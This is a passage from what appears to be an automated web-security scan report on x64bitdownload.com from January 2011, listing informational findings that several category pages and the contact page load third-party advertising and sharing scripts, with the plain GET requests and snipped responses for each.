Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2247%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81928


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1419. http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-desktop-downloads-4-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-desktop-downloads-4-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:09 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%224%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76654


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1420. http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-development-downloads-5-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-development-downloads-5-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%225%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77292


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1421. http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-education-downloads-6-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-education-downloads-6-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:27 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%226%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74554


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1422. http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-games-entertainment-downloads-7-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-games-entertainment-downloads-7-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:38:11 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%227%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86717


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1423. http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-graphic-apps-downloads-8-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-graphic-apps-downloads-8-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:18 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:38:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%228%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81027


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1424. http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-home-hobby-downloads-9-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-home-hobby-downloads-9-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:39:30 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%229%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90164


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1425. http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-multimedia-design-downloads-258-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-multimedia-design-downloads-258-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:36 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22258%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29669


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1426. http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-network-internet-downloads-10-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-network-internet-downloads-10-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:39:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2210%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79744


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1427. http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-security-privacy-downloads-11-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-security-privacy-downloads-11-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:30:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:40:16 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2211%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86135


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1428. http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-servers-downloads-12-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-servers-downloads-12-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:30:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:40:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2212%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79861


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1429. http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-system-utilities-downloads-13-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-system-utilities-downloads-13-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:31:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:41:19 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2213%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83609


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1430. http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-web-development-downloads-14-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-web-development-downloads-14-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:07 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2214%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89951


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1431. http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-widgets-downloads-304-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /categories/free-64-bit-widgets-downloads-304-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22304%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73700


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1432. http://www.x64bitdownload.com/contact.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /contact.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /contact.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

